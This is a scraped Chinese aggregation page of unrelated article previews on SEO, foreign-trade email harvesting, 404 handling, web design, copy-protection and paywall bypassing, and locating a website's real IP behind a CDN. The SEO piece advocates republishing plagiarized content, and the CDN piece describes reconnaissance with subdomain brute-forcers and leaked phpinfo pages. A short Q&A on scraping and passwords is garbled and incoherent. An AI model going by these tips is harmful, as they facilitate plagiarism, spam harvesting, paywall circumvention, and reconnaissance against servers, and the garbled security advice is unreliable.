　　首先我们要了解到搜索引擎蜘蛛要想爬行和抓取一个页面必须要满足两个特点，第一、足够的外链来吸引蜘蛛抓取;第二、网站的更新频率。在百度站长平台里面每个站点都会有一个抓取频次，而抓取频次我们可以特定的看作站点受蜘蛛的喜爱程度，也可以通俗的理解站点抓取频次越高，那么你站点被蜘蛛喜爱程度就会越高，从而你的收录就会加快。如果使用蜘蛛池这类程序的同学，我想就应该非常清楚，但是很多朋友即使使用了蜘蛛池那也只是外部链接进行吸引蜘蛛，如果配上站点更新频率，效果更佳!
　　二、收录与索引
　　大家都会通常的认为页面收录与页面建立索引并无太大区别，其实不然，在整个站点页面文档中会有两种情况发生：
　　1、URL收录=是，索引=否;代表已经进入了索引，只是这个网页的“权重”非常非常低，可以视作是“无效索引”。
　　2、URL收录=是，索引=是;代表已经有资格参与排名，但是不保证100%能获取排名，可以视作是“有效索引”。
　　我们可以简单的去理解site出来的站点页面是被收录的，但不代表site出来的页面是被索引的。但是我们依然可以去检测出页面是否具备参与排名的资格，如下图所示：
　　Domain与Site最大的区别在于后者可以统计页面收录，而前者我们可以分析出站点外链域，而这里的作用我们并不是去讨论外链域，而是仅仅使用Domain命令来检测站点能够参与排名的有效数值。
　　其实大家可以用一种非常简单的方法去快速检测你的页面是否有参与排名的资格，如下图所示：
　　上面三张图我们可以把site出来的收录页面进行搜索查询，可以检测到页面被收录，但是当你搜索整个标题却没有排名，也就是前面我提到过的url收录=是 但是url索引=否，说明网页“权重”较低，并没有参与排名，那么我们再来看几张图，如下图所示：
　　从上图我们可以看得出，该页面不仅仅被收录，还建立了索引，并且搜索整个标题可以检索到排名。从这点我们可以看出，索引的页面无需做任何外链、内链、甚至是抄袭的文章即可有参与排名的资格。那么问题来了，该如何进行有效的页面进行建立索引并建立起参与排名的资格?
　　很多人在思考一个问题，文章要尽量原创，满足用户需求，提高用户体验等等。但是为何有些站点收录非常好，排名也非常不错，文章却是采集或者伪原创。讲到建立索引以前，我们继续先把剩下的一个工作原理分析完毕。
　　三、检索与排名
　　在整个检索与排名中，会体现出最常用的两个搜索引擎原理，一个就是倒排索引，另外一个就是TD-IDF算法，首先我们来了解下倒排索引的更新策略，如下图所示(来自百度百科-倒排索引)：
　　
　　在整个倒排索引结构中，最常见的有四种更新策略，而上述的案例中就用到了其中两种，如果大家仔细的去观察我的每一个文章，就不难发现即使我的页面是纯抄袭文章，但是我抄袭的每一个标题和原来标题不相同，并且标题会更加的去符合页面内容，提升页面词频需求(TD-IDF)。其次则是抄袭的文章不会直接复制粘贴，我会进行重新排版，重构页面从而达到页面并非采集的作用。
　　在搜索引擎里面。有一个算法叫做TD-IDF算法，简单来说，TD-IDF算法(详细公式参考：))是用来检索页面文档关键词出现的频次。并且可以通过该算法计算一个文件集合里面的词频出现的次数从而来评定一个页面的重要程度。而该重要程度是结合页面TITLE来计算，也就是大家常说的文章内容要符合页面标题的主题相关性(类似作文写作中的紧扣主题)。
　　看到这里，我相信很多朋友就会理解为何蜘蛛池程序可以快速提升收录并且有部分页面进行参与排名，很大的一个特点就是蜘蛛的频繁抓取，从而建立了索引，在短时间内让页面“权重”提升，并且促进排名，而新闻站点的原理也是因为蜘蛛抓取频繁的特点，几乎无需发布任何的外链即可有很好的排名。
　　现在我们再来分析和思考整个页面的抓取到最终的检索排名我一共操作了哪些：
　　第一、大量的不定时更新，让蜘蛛抓取频繁抓取(建议给百度提交站点地图，定时更新站点地图)
　　第二、大量采集文章通过修改标题与布局重构让页面变得更新有新鲜度(满足更符合页面的用户需求)
　　第三、每天保持大量的更新让蜘蛛抓取形成习惯
　　第四、由于该站是老域名，加上站点原始数据积累，可保持站点的权威度，从而相对新域名来说站点更加具备抓取优势。
　　总而言之，虽然最后只给大家留下了4点，当然也有很多SEO同学会觉得我说了一堆没用的，但是如何你真正的去领悟到我所提到的一些核心要点，那么你就不难发现SEO建立索引的奥妙所在，做SEO，思路决定出路，我更加建议seo同学们可以多去了解
　　搜索引擎的一些基础算法
　　和百度官方优化指南文档，如果能够把里面的任何一个核心点通过实战的方式去吃透他，那么比你看任何的所谓的SEO文章都要有价值! 查看全部

　　揭秘各类外贸客户搜索软件的搜索原理！
　　
　　对于外贸客户搜索软件，大家应该都并不陌生。基本上我们每个月邮箱里都会受到各种各样的推销信，这些个软件公司大多坐落在广州，通过邮件、电话、外贸论坛宣传的形式在推销。
　　很多人对此很反感，认为这些软件都是投机取巧的，没什么效果。也还有不少人会很好奇，这类软件效果真的好吗？因此很多人花费时间去百度免费版、破解版、试用版，发现根本就用不了。那是当然的，被你随便就免费用上了他们还赚什么钱呢？
　　其实客户搜索软件搜索的原理就是一句话：产品关键词+“强制匹配”+“与” “非” “或”+ 域名限制 并全站抓取 Email。
　　下面给大家揭开此类软件神秘的面纱并具体说明原理和优缺点：
　　1. 搜索方式
　　基本上各类外贸客户搜素软件都是以 Google 为主要搜索引擎，当然他们也会配一些其他的搜索引擎。演示的时候他们只会给你演示Google，因为其他搜索引擎数据没有Google足。
　　如下图：
　　
　　2. 目标市场和区域选择
　　如下图：
　　
　　实际上此类软件这一流程的功能就等同于Google的“site:”命令，如果你对Google比较熟悉的话，你懂的。
　　这就是让搜索的网页中全部显示以 .国家 结尾的网站。
　　打个比方，这里你选择了英国。那么等同于google搜索栏中敲入了 site:.uk 这样所有出来的网页全部都是 ，保证全部都是英国的网站。你懂的！
　　（如果不懂，在google上输入 packaging machine site:.cn 看了搜索结果，你就懂了）
　　如果是选择了意大利，那么等同于那么等同于google搜索栏中敲入了 site:.it 你懂的！
　　（但是先用google翻译把产品名翻译成意大利语吧。如果你对翻译的准确性不太有把握，那么也好办。找个行业内的客户的网站上去看看产品名即可）
　　另外，也可以在GOOGLE的 Advanced search 里找到 地区(Region)，设置某一个国家或地区。这样其实就是这个软件此环节的作用。
　　3. 输入要搜索的产品名和其他搜索条件

　　这里实际上就是输入你要搜索的产品关键词。那么等同于在Google搜索栏上输入：led lamp site:.uk
　　第二栏那里是“包含完整字句”，这里其实是强制完全匹配你的关键词 led lamp，在Google搜索引擎中起这个作用的是双引号。等同于在Google搜索栏上输入："led lamp" site:.uk
　　使得搜索结果完全匹配，比如如果此时重新输入"cheap led lamp"，那么原先搜索到的网页不会出现，因为是完全匹配，原先的网页没有cheap一词。
　　第三栏那里是“至少包含一个”，其实等同于Google的“OR” 命令，如果你输入led lamp（Led灯）的同义词 “led tube”，
　　那么等同于在Google搜索栏上输入：led lamp OR led tube site:.uk 这里OR是大写，注意！
　　第四栏那里是不包含的字词，可以看到软件默认有：china b2b forum blog wikipedia .cn .edu .gov alibaba
　　其实这里等同于Google做减法，即把搜索结果中包含此类词的网页过滤掉。即相当于“-”。
　　等同于Google搜索栏上输入：led lamp -china -b2b -forum -blog -wikipedia -alibaba site:.uk
　　（这里其实可以看出来软件公司也是花了一些心思，想绕开无关的网页和B2B网页）
　　4. 点“确定”，即开始进行搜索任务，开始边搜索边抓取Email地址
　　如下图：

　　可以看到，整个外贸客户搜索软件的高效率主要体现在这里。搜索到一个网站，就在这个网站里抓取所有的邮件地址。
　　实际上，这也没有什么神秘的。
　　等同于Google搜索栏上输入：site: email or E-mail (不带 )
　　好了，大家看到这里也明白了此类软件的搜索原理。其实所有功能都可以用Google原生的搜索方式来实现。
　　下面来说说优缺点：
　　优点只有一个：操作起来稍微方便一些，傻瓜式。另外搜索起来比较高效率，抓取Email 地址很快。
　　缺点：一大堆。事实证明，让一群外行人来开发此类软件的确是无法尽善尽美。
　　1）做减法时，软件公司也是花了一些心思，想绕开无关的网页和B2B网页。可是他们毕竟不是业务人员，没有好好地研究过各类B2B网站。因此屏蔽词的词汇明显不够！
　　最起码很常见的B2B网站用的高频词“marketplace” 和"trade leads" 你总该包含到吧。于是在原有的屏蔽词的基础上，给了个建议，再增加一些：
　　-leads -marketplace -directory -business -platform
　　即搜索变为：
　　led lamp -china -b2b -forum -blog -wikipedia -platform -leads -directory -marketplace -business
　　site:.uk （想试试看的童鞋你们把产品名 led lamp 改成你们的产品名然后把整句放入Google内试试效果吧。）
　　2）搜索方式单一，只体现的是单一产品名搜索。这效果是比较差。
　　其实稍微 brain strom 一下就可以想想：为什么关键词只输入产品名，还可以怎么变化。。
　　童鞋提问：加上buyer， importer，wholesaler, distributor, importing, distributing, trading, 效果会不会好些?
　　回答：No，如果你用buyer，那关键词还绕开B2B干嘛？Buyer是最差的关键词。除去buyer其他都是可以的。因为很多客户公司的网站上公司简介页面会有对自己公司的描述：
　　如：We are importer of disposable medical products.
　　We are the lastest distributor of xxx brands in northen america.
　　We engaged in import and export / We are a trading company for disposable medical products in Australia....等等。。
　　另外不一定要用具体产品名啊，你懂的
　　另外如果某个地区公司名有共性啊，你懂得
　　3）抓取Email方式粗糙，不全！
　　会用Google的童鞋肯定不会放心于此类软件抓取的email 地址。因为只在网站上搜索，我们需要更多更保险的邮件地址。
　　所以最好还要进行Google再次搜索。
　　因此给出的建议是在鼠标右键菜单中加入一个选项，可以对某一个网站再单独进行外部程序的google搜索：
　　网址 Email OR E-mail OR contact
　　网址 Email OR E-mail OR contact site:.国家域名
　　4）无法实现很多其他Google搜索方式，如 image, map, earth
　　对于这一条缺点，我朋友说，鉴于工程量太大，无法实现。
　　5）无法实现更多的其他搜索功能，如SEO相关（Related, Link），以及搜索文件类型 filetype 等等。。
　　其实还有很多关键词变化技巧，学会逆向思维，学会抽象思维，学会横向对比思维，学会纵向对比思维。。
　　（文 / 料神 Sam）
　　
　　这里有你不容错过的精彩~~~点击上方蓝色字即可一键关注哦~~~ 查看全部

　　网页抓取解密是要与python脚本分开开发的，二者没有严格的界限
　　网页抓取解密是要与python脚本分开开发的，二者没有严格的界限，要看需求，如果是需要用户密码保存到本地，这属于post，
　　python是明文传输，但是可以写代码，设置隐藏密码的密码。所以不需要上传数据库，直接获取网页就可以。
　　按道理要求在服务器中同步的，不知道你们的安全保障怎么样。多说一句，不要轻易采用明文。
　　如果你给我把你的账号解密后我要密保的。
　　你老板那么关心你，
　　无需上传数据库，主要需要在开发时考虑分析ajax请求，例如获取数据库信息，可以定义rawdata，
　　看你python用的是哪种方式，如果是web应用的话，建议在web的python中设置访问sqlite、postman的超时，避免爆发数据库冲突等。然后分析ajax请求，获取数据库信息、网页json、rawdata等。是使用tornado，flask等框架来写restfulweb服务的话，定义json的格式，设置加密参数等。
　　如果不建议使用json，设置zlib，bcrypt等字典来设置json中的保密，很可能失去一个收集大量用户私钥的机会。希望对你有所帮助。
　　如果自己写定义一个函数作为python从服务器获取数据的接口，或者你的网站爬虫想调用公共接口的话，建议不要用web框架，还是自己设置访问权限比较安全。你用resautojs做服务器，然后完全自己写api，不上线公开给别人爬虫，这样比较安全。另外，如果你直接定义访问密码然后通过admin.authenticates()和response.body['code']判断是否可以收到，这样会有一些问题。 查看全部

　　网页打不开？小壹带你揭秘“404 not found”
　　
　　
　　“404 not found”可能是网络上最知名的错误信息，小伙伴们一定都遇到过这个网页提示吧，但这组数字具体是什么意思呢？让小壹猜一猜，知道正确答案的人是不是很少？所以今天就让小壹带你一起揭秘“404 not found”吧。
　　
　　预备知识
　　当用户试图通过HTTP或文件传输协议访问一台正在运行Internet信息服务(IIS)的服务器上的内容时，IIS返回一个表示该请求的状态的数字代码，该状态代码记录在IIS日志中，同时也可能在Web浏览器或FTP客户端显示，状态代码可以指明具体请求是否已成功，还可以揭示请求失败的确切原因。
　　一、什么是404 not found？
　　404是HTTP其中一种的标准回应信息，通俗的说，当用户浏览网页时，服务器无法正常提供信息，例如用户输入了错误链接;或者无法相应并且找不到原因，这时候页面会出现这个404页面。404 not found其实代表一个404页面，当用户在浏览网页的时候，由于服务器无法正常提供信息，或者是服务器无法回应，且不知道原因而返回的错误页面，目的是告诉搜索引擎该页面不存在，不再让搜索引擎爬虫去继续访问这个页面了。
　　
　　
　　二、设置404页面的作用
　　1、告诉访客页面错误，引导访问其他页面，除了增加用户体验外还可以减少流量的流失，降低网站的跳出率；
　　2、当搜索引擎爬取到一个错误链接或死链接时，网站应该返回404状态码，告诉搜索引擎放弃对页面链接的抓取，提高搜索引擎对网站页面的抓取效率。
　　
　　
　　三、造成该页面的原因是什么
　　1、用户由于输入链接地址错误，从而导致IIS提示404 not found。
　　2、服务器上原有页面被删除了，这种情况多发生大型论坛中，BBS论坛为了保障服务器的资源合理运用，都会将过期或非常久远的信息页面删除，导致404 not found。
　　3、当用户在国内访问一些被禁止访问的国外网站时，会出现404 not found的现象，这需要使用代理服务器才能正常浏览。
　　
　　
　　四、页面出现404的解决方法
　　1、由于网页内容路径改变而导致404 not found时，我们可在IIS 中定义404错误指向一个动态页面，在页面里面使用301永久重定向跳转到新的地址，此时服务器返回301状态码。
　　2、设计一个html文件，最后将404 指向该html 文件，此时页面将返回404状态码。打开IIS管理器-->点击要设置自定义404的网站的属性-->点击自定义错误选项-->选中404页-->选中并打开编辑属性-->设置成 URL --> URL 里填写“/err404.html”-->按确定退出再把做好的err404.html 页面上传到网站根目录下。此处在“消息类型”中一定要选择“文件”或“默认值”，而不要选择“URL”，不然，将导致返回“200”状态码。
　　3、将404指向一个动态页面。比如error.asp,如果不在页面里面进行设置，仅仅是返回提示的HTML 代码，将导致页面返回200状态码，这是不正确的，我们可以在显示完提示内容后，增加语句：Response.Status="404 Not Found"，这样就保证页面返回404状态码。
　　4、Apache下设置404错误页面。Apache Server设置404错误页面的方法很简单，只需在.htaccess 文件中加入如下内容即可：ErrorDocument 404 /notfound.php 查看全部

　　遇到网页文章不让复制，送你一串代码1秒破解
　　
　　经常和电脑打交道的朋友，一定有过这样的难题，在网上查资料找文章，复制文章的内容才发现必须要注册登录才支持，也太麻烦了吧！
　　
　　这种限制复制文字的网页，其实是用JavaScripty代码来实现限制复制的，当然，解铃还须系铃人，今天教大家一串代码接触限制。1、代码接触限制首先在我们需要复制内容的网页中的地址栏中输入：javascript:void($={});然后按下回车键Enter，然后网页的内容就可以支持任意复制啦！
　　
　　2、通用识别方法同样方法不仅支持提取网页中的文字，还能够提取书本、图片上面的文字，在书本中遇到需要摘抄到电脑的内容，也可以轻松提取，方法如下：我们打开迅捷PDF转换器工具，在特色功能中找到"图片转文字"，然后将网页的图片截图，或者书本中的内容拍照上传。
　　
　　点击转换之后即可将文字输出到Word文档中，我们一起来看看效果：
　　
　　3、在源文件中复制
　　
　　掌握好这3种方法，以后不用担心网页上的文字无法复制了
　　 查看全部

　　解密：外贸营销网站建设怎么做？
　　最近有很多公司找我们做外贸营销网站建设，但是他们只对外贸有概念却对外贸营销网站没有概念，今天小编就为大家说说一个真正的外贸营销网站建设怎么做。
　　一个优秀的外贸营销网站建设必须具备这几个关键点： 1、外贸营销网站建设布局是否能吸引客户注意; 2、外贸营销网站建设上的客户访问是否能转化;外贸营销网站建设怎么做才能具备以上两点?
　　一、做外贸营销网站建设要使用国外主机
　　网站的访问速度与网站所存放的服务器所在区域有直接关系。外贸网站推广的搜索引擎主要在美国和欧洲，其服务器存放地点也在这些地区。如果外贸网站主机 放在国内，国外的访问时页面下载速度明显放慢，不仅影响搜索引擎蜘蛛程序抓取数据，也不利于海外客户访问网站。所以，放在国内可以让海外的朋友或客户在国 外测试一下网站打开速度，以判断是否需要转移主机。
　　二、网站首页要尽量突出重点 网站首页尽量避免FLASH和形象展示图片，做成有丰富文字和产品图片的内容型首页，让客户和搜索引擎直接通过首页获得丰富的信息和链接。三、全站都要实现静态化 采用能够自动实现动静转化的内容管理系统发布产品，使网页都以htm或html结尾呈现。这样相比动态的网页来说，搜索引擎更乐意抓取并给予更高的排 名。一些处于框架中或动态技术生成的产品目录菜单b由于难以被搜索引擎识别，因此添加一个网站地图(sitemap)很有必要，以静态产品目录为主要内 容。
　　四、中文编码转化为国际语言编码 外贸网站源文件显示为“charset=gb2312”是中文的编码，外贸网站应为国际编码charset=UTF-8，如果是中文的编码，在中国内 能够正常的显示，别的国家有可能会出现编码乱码的情况，以至于打不开网站，而国际的编码都会正常的显示，这些都是我们神兵网站建设所注意到的细节部分，正 所谓细节决定成败。
　　五、做纯英文版更有意义
　　因为我们做的是外贸网站，如果网站分为中英文版是毫无意义的。
　　六、如何提升外贸营销网站排名 搜索引擎判断一个网站的排名优势的重要指标是网站的外部链接数量，尤其是高质量的来自其他的网站的链接。国内网络推广公司做优化排名由于对英文网络资源不熟悉，无法帮客户做到，英文网站的网页级别普遍比中文网站高出1-2级，因此必须获得大量来自英文网站的链接才能提升搜索引擎优化的效果。
　　七、经常更新一些吸引眼球的内容
　　为了吸引搜索引擎蜘蛛程序经常光顾你的网站索引新数据，必须保持网页处于经常更新状态，这样，当你的新产品页面推出也可以及时被索引到，而不是到了一个月后才被买家搜索到，贻误商机。八、产品增加文本描述，图片要加网站水印，隐藏图片的关键词密度产品展示中，不少统一的产品只有货号，规格、包装等简单信息，缺少产品关键词，缺少文本的描述，宜在货号前加上品名或在访问提示路径上加上产品类别名。
　　 查看全部

　　寻找网站真实IP手段大揭秘！
　　
　　首先，我们来认识下最寻常的真实ip隐藏的方法“CDN”。
　　内容分发网络(content delivery network或content distribution network，缩写作CDN)指一种通过互联网互相连接的电脑网络系统，利用最靠近每位用户的服务器，更快、更可靠地将音乐、图片、视频、应用程序及其他文件发送给用户，来提供高性能、可扩展性及低成本的网络内容传递给用户。
　　CDN节点会在多个地点，不同的网络上摆放。这些节点之间会动态的互相传输内容，对用户的下载行为最优化，并借此减少内容供应者所需要的带宽成本，改善用户的下载速度，提高系统的稳定性。
　　运用一些命令查看，比如：ping、nslookup、ipconfig这类方法需要打开windows的dos运行界面
　　
　　用nslookup命令查询想要查的域名，若是有多个ip就是用了cdn，多半不是真实IP；如图：
　　
　　其他方法类似
　　用ping命令输入：ping
　　用ipconfig命令输入：ipconfig
　　可以从多个地点ping他们想要确认的域名，若返回的是不同的ip，那么服务器确定使用了cdn，返回的ip也不是服务器的真实ip；
　　常用的网址有just ping:等等。
　　
　　1、子域名查找法
　　因为cdn和反向代理是需要成本的，有的网站只在比较常用的域名使用cdn或反向代理，有的时候一些测试子域名和新的子域名都没来得及加入cdn和反向代理，所以有时候是通过查找子域名来查找网站的真实IP。下面介绍些常用的子域名查找的方法和工具：
　　微步在线（）
　　上文提到的微步在线功能强大，黑客只需输入要查找的域名(如)，点击子域名选项就可以查找它的子域名了，但是免费用户每月只有5次免费查询机会。如图：
　　
　　Dnsdb查询法。（）
　　黑客只需输入 type:A就能收集百度的子域名和ip了。如图：
　　
　　Google 搜索
　　Google site: -www就能查看除www外的子域名，如图：
　　
　　各种子域名扫描器
　　这里，主要为大家推荐子域名挖掘机和lijiejie的subdomainbrute（）
　　子域名挖掘机仅需输入域名即可基于字典挖掘它的子域名，如图：
　　
　　Subdomainbrute以windows为例，黑客仅需打开cmd进入它所在的目录输入Python subdomainbrute.py --full即可收集百度的子域名，如图：
　　
　　总结：收集子域名后尝试以解析ip不在cdn上的ip解析主站，真实ip成功被获取到。
　　2、IP历史记录解析查询法
　　有的网站是后来才加入CDN的，所以只需查询它的解析历史即可获取真实ip，这里我们就简单介绍几个网站：微步在线，dnsdb.ionetcraft(),Viewdns()等等。
　　3、网站漏洞查找法
　　通过网站的信息泄露如phpinfo泄露，github信息泄露，命令执行等漏洞获取真实ip。 查看全部

　　揭秘：电商网站用户体验最差的“15种类型”
　　众所周知，一个网站用户体验的好坏直接影响网站的收益，因而了解网站的用户体验是至关重要的，99click作为国内领先的网站数据分析服务商，通过对上千家商务网站的数据分析及用户行为研究，总结出影响电商网站用户行为的15种类型，仅供参考:
　　1
　　超长的页面加载时间
　　如果页面加载时间超过30秒，很难有用户会喜欢这个网站。当然30秒已经是比较夸张了，现在一般的电商网站，都要求在3秒之内加载出来。移动端的要求就更高了，一般要求无等待间隔的加载，即毫秒级的加载速度，实在比较慢的，都有过渡性的加载中提示。
　　2
　　无限制的使用flash及图片
　　无可否认，适当的用一些图片及flash，可以增加网站的生动性，增加视觉冲击力。但无限制的使用flash及图片，会造成页面文件超大，占用浏览者的cpu资源，并且不利于页面更新及搜索引擎对网站的抓取。移动端目前应该还好，目前的设计规范里面都没有说还用Flash的，并且对移动端使用的图片大小一般都有限制。
　　3
　　页面排版过长
　　一般很少有浏览者有兴趣看页面中最下面的内容，不要拿自己来举例， 90%的用户，打开一个页面，只浏览第一屏的内容，就以为看到了全部，而不会向下滚动。在一个网站的首页,能看到第三屏内容的人只有10%以下，一个过长的页面很容易引起浏览者的视觉疲劳,更何况大部分浏览者很有可能已经被前两屏的内容吸引到别的页面去了。
　　4
　　不友好的导航
　　不友好的导航是最影响用户操作的，不能让用户很方便的找到自己想到的内容。用户来到一个页面不知如何返回上一页，不知道当前页面是在哪个栏目下的。这样很可能用户来了一次就不会再来了，这也是现在比较强调信息架构设计的原因，导航设计是信息架构中的一部分。PC端还好，移动端的产品若没有良好的导航设计，简直就是体验的灾难。用户每次都得用重新打开APP的方式来寻找内容的话，很难有用户会留存。
　　5
　　过期的信息
　　很久不更新的信息，很容易让浏览者感到反感，而且在心中也会对这个产品的品牌形象大打折扣。试想一下，你在使用某款产品的时候，好不容易看到感兴趣的内容，结果点进去发现已经过期了，是什么感觉？会觉得是这个产品在忽悠人吧，过期的新闻，过期的促销信息、活动信息都是致命伤。
　　6
　　死连接或连接错误
　　这个就不说了，比上面过期的还要严重，这是最基本的错误，但是好些产品的页面上还是会有这样的错误，包括新浪这种大网站。这也是为什么404页面可以做那么多文章并大行其道的原因。
　　7
　　孤立的页面
　　用户不知用什么方法返回首页，有点类似导航设计的缺陷，这种情况往往是出现在信息提示页或内容调查的结果页上。
　　8
　　页面没有视觉差异
　　页面没有视觉差异，页面设计很”平”缺少”层次感”，缺少视觉冲击力和亮点，或者视觉冲击力突出的并不是网站的主体内容，这是没有经验的设计师设计产品时最容易犯的错误。把一大堆信息铺天盖地的展示到浏览者的眼前，你认为他会记住多少? 页面设计要吸引并引导浏览者来观看你想推广的内容或产品。当然对网页”层次感”的设计并不是简单的用一些纯度高的颜色来实现，要根据页面的环境及周边元素综合考虑。就象在一个黑板中画一个白点很明显，但在一个白板上画一个白点就看不清楚了。
　　9
　　链接没有标准的表现形式
　　现在很多刚上网的人还只认为有带下画线的文字才是链接，网站要有统一标准的链接表现形式，并且要和没有链接的文字有区别。要让浏览者很方便的认出哪些是带链接的文字。移动端上的区分是把所有有链接的文字都做成按钮或区域的形态了。
　　10
　　过多的运用新技术
　　所谓新技术，就是只有少数人掌握的技术，虽然有可能它的视觉效果很好，功能很强大，但过多的运用新技术，就意味着你准备抛弃大部分用户，即会给大部分用户带来学习成本。新技术可以等普及认知了之后再开始使用，有时候也可以考虑一下目标人群，看是否是接受新事物比较快的。
　　11
　　缺少互动的内容
　　缺少互动的内容，缺少用户的参与。不能让用户表达情感和思想，注定这个产品只是个固步自封的产品。现在最基本的，都要提供的一个“意见反馈”的入口，以便产品的忠实用户发表看法，从而收集这部分反馈去改进产品。再者有互动的口子，也会让用户觉得产品是比较开放的。
　　12过复杂的域名和页面命名方式
　　过复杂的域名和页面命名方式，不利于搜索引擎对页面的抓取，并且也不利于浏览者的记忆。几乎100%的人输入网址时会用到IE的缓存cookie，目录和文件过于复杂，排在IE缓存很靠下的地方，当然被第二次访问的机率小的多。不要说什么用收藏夹，你以为会有超过一半的人会用收藏夹吗？而且那种收藏夹过于庞大的人，想在收藏夹里找一个网址也是比较不容易的。
　　13使用iframe框架
　　不建议使用iframe框架，不为什么，就因为搜索引荐不喜欢。连google的广告计划中，对有框架的代码都是单独的。这块其实完全是PC端的要求，移动端还好，不过移动端的搜索应该也不喜欢框架。很多时候我们使用框架，都是为了达到某种简化操作的目的，需要权衡，该用的时候还是得用。
　　14恶意插件，恶意弹出窗口
　　插件现在应该被360啊，各类拦截扫的差不多了。主要是广告，放点广告无可厚非，但是弹出式的就恶心人了。一般的广告可以无视，弹出的广告还得去操作关闭一下，有时候点错了，还会出来更多的弹出窗口，那叫一个杯具啊。
　　15页面中不要过多的用“_blank”
　　过多的弹出新窗口，会大量占用计算机的资源，影响浏览者的浏览速度，这是从纯技术的角度考虑了，从产品策略上考虑，还是应该按策略来设计，不过这里要注意一点的是，不要为了某个PV的KPI指标而把页面打开弄成新窗口打开，有时候会影响操作体验。 查看全部

　　解密企业网站建设全过程
　　新朋友,欢迎点击标题下"美天网页设计".选择关注
　　老朋友,欢迎点击右上角"分享朋友圈"
　　现如今说到企业网站建设，相信很多的企业主都不再陌生，因为网络营销已经常态化的走近了我们。我们今天就这个大家非常熟悉的事情来说一说。
　　网站建设第一步：网站策划
　　网站策划工作需要网络营销专家和企业相关负责人（大领导、销售经理、客服主管、技术工程师、销售精英）来交流。企业相关领导提出的想法和要求，网络营销专家就时下网络营销发展现状结合这些想法给出意见和建议，得出一个共识。
　　在这个共识的基础上，加以对业内同行在互联网上的现状分析做出一个网站建设指导下纲要，这就是网站策划。
　　网站建设第二步：域名 空间 网站备案
　　域名对一个企业的宣传效果有着积极的意义，我们可以看到一些大公司会为了一个简单、易记的域名花上几百万、几千万，域名策划方向我们建议围绕公司字号或公司主营展开。
　　空间也就是存放网站的服务器，空间的好坏关系到网站打开的速度和安全，要知道没有人会花10秒以上的时间去等待一个网站的打开，更没有愿意去打开一个有风险提示的网站。
　　网站备案是国家工信部的要求，也是一个企业真实信息的证明。没有备案的网站只有两个可能：一是这个网站的主体是虚假的；还有一个可能就是做网站的公司不具备网站备案资格（也有可能是这个做网站的公司为降低制作成本而选择廉价的海外服务器）。
　　网站建设第三步：网页设计
　　网页设计包含了网站视觉策划和网站布局策划两个方面。
　　1、视觉策划用最普通的语言来表达就是美工，网页美工一般要考虑到企业的整体形象，要符合CI规范。要注意网页色彩、图片的应用及版面规划，保持网页的整体一致性。同时要考虑到网站目标用户的习性。
　　2、网站布局说的简单一点就是网站内容的摆放，什么样的内容放在最上面，什么样的内容放在中间位置，在那里放面包屑导航（方便用户进入其他页面的链接）...网站布局的宗旨：符合搜索引擎抓取习惯、满足用户点击访问要求。
　　网站建设第四步：网站内容建设
　　这个环节是需要企业来完成的，就在这个环节上让很多企业的网络营销效果大打折扣。我们经常可以看到有一些网站做起来什么样，几年之后还是什么样，甚至网站上看到的日期还是网站做起来的时间。这样的网站传递给用户的信息是：这个网站不专业、这个公司不专业。
　　要知道现在的用户不会愿意和一个不够专业的供应商打交道，因为不够专业的供应商不能提供专业化的建议和专业化的服务。
　　网站建设第五步：网站外部建设
　　网站外部建设可以说有9成的企业没有去做。记得我在进入互联网的第二年，就这样告诉客户：你想守株待兔吗？如果你不想守株待兔的话，就在互联网上建一个森林，想要兔子的时候可以到森林里面捉。用一句简单的话来表述网站外部建设“普遍撒网 重点培养”，网络营销绝不仅仅是网站+百度+阿里巴巴这么简单。
　　以上5个步骤加在一起，才是一个完整的企业网站建设全过程。您的网站做了几个步骤？ 查看全部

　　网页付费文档无法下载？教你3种破解方法，全网文档免费使用
　　网页付费文档无法下载？教你3种破解方法，全网文档免费使用
　　我们如何复制一些收费文档里面的内容呢？下面笔者将自己珍藏的3种破解方法教给大家，一起来学习一下吧！
　　1、打印复制
　　生活中经常遇到找到文档，复制使用时显示收费的状态，其实只要按住快捷键【Ctrl+P】，打开打印预览功能，点击里面的文字直接就能进行复制，复制完成新建一个文本文档，直接进行粘贴就可以使用。
　　
　　复制网页文件进行粘贴，文字展示效果。
　　
　　2、图片转文字
　　第二种方法比较简单化，如果不能复制我们可以通过电脑截图的方式。
　　QQ截图：Ctrl+Alt+A；微信截图：Alt+A
　　然后将截图上传到迅捷PDF转换器里面，该工具里面有一个特色功能区，可以将图片里面的文字提取出来，并自动转化成文档。
　　
　　上传图片点击开始转化按钮，自动转换之后会以照片上传的顺序，进行依次转化成文档并保存下来。
　　
　　3、代码扫描法
　　代码法比较适合程序员使用，不过今天笔者简化了一部分的代码操作，那么我们在日常生活中，遇到不能复制的文档，用这种方法也可以。
　　
　　首先找到文档，右击进行网页源代码的查看，或者快捷键Ctrl+U。点击查看。
　　
　　代码复制方法复制的时候比较麻烦，可能需要在众多代码里面寻找想要复制的段落。复制起来比较费时间，但是也能免费使用。
　　
　　以上3种方法已经全部展示完毕，过程不复杂，操作也很简单，并且日常使用频率较大。码字不易，看完点个赞再走啊！
　　 查看全部